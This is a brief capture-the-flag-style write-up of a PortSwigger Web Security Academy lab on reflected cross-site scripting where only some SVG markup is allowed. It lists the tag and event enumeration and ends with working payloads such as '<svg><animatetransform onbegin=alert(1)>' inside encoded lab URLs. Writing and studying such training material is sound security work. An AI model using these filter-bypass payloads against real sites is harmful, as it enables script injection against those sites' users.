Port Swigger Reflected XSS with some SVG markup al
Reflected XSS with some SVG markup allowed
Solution
Open the website: https://0a9800a703938046cd7eb93700b3000e.h1-web-security-academy.net/
https://0a9800a703938046cd7eb93700b3000e.h1-web-security-academy.net/
Payload: <script>alert(1)</script>
---
https://0a9800a703938046cd7eb93700b3000e.h1-web-security-academy.net/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Tags wordlist from --> https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
---
──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Reflected XSS with some SVG markup allowed]
└─$ head -n2 tags.txt
a
a2
---
Allowed tags:
image
svg
title
Checking which events are acceptable
Tags wordlist from --> https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
---
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Reflected XSS with some SVG markup allowed]
└─$ head -n2 events.txt
onafterscriptexecute
onanimationcancel
---
Allowed events:
onbegin
Payload: <svg><animatetransform onbegin=alert(1)>
https://0af0008804b0e733800b03a000be00ec.h1-web-security-academy.net/?search=%3Csvg%3E%3Canimatetransform+onbegin%3Dalert%281%29%3E
Solved